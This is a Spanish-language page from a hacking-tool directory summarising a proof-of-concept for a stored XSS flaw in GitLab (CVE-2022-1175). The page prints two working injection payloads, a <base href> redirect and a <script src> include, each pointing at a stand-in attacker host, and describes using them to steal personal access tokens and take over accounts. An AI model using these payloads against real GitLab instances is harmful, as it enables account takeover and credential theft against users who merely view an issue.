Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-1175 — Exploit de prueba de concepto para XSS almacenado en GitLab (CVE-2022-1175) que permite el robo de tokens de acceso personal y la toma de cuentas mediante comentarios maliciosos en issues. | Kitploit
Herramientas/GitHubGitHub/greenwolf/cve-2022-1175
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubgreenwolf/cve-2022-1175

CVE-2022-1175

Exploit de prueba de concepto para XSS almacenado en GitLab (CVE-2022-1175) que permite el robo de tokens de acceso personal y la toma de cuentas mediante comentarios maliciosos en issues.

Ver Repositorio
11hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-1175

Gitlab Stored XSS, puede configurarse en un issue de un proyecto, ya sea propio o de otro usuario. Permite ataques como crear y robar un Personal Access Token (PAT) de cualquiera que visite el issue. Los PAT pueden proporcionar acceso completo a la API de Gitlab como ese usuario, equivalente a una toma de control total de la cuenta.

Puede ser abusado cambiando la base del proyecto a tu sitio, de modo que los scripts sean obtenidos desde tu sitio. Cambia javascript en tu sitio para que coincida con los nombres de los scripts que se llaman en la página. Sin embargo, esto puede romper cosas en la página.

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><base href=http://unsafe-website.com/><pre x=&#34;"><code></code></pre>

La inclusión estándar de scripts también funciona dependiendo de la política CSP del sitio. Esto es más sigiloso.

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><script src="https://attacker-site.com/bad.js"></script><pre x=&#34;"><code></code></pre>

Los desarrolladores de GitLab incluyeron convenientemente la cadena XSS completa en el código que se puede encontrar aquí:

https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4

Referencia:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175

Descargar herramienta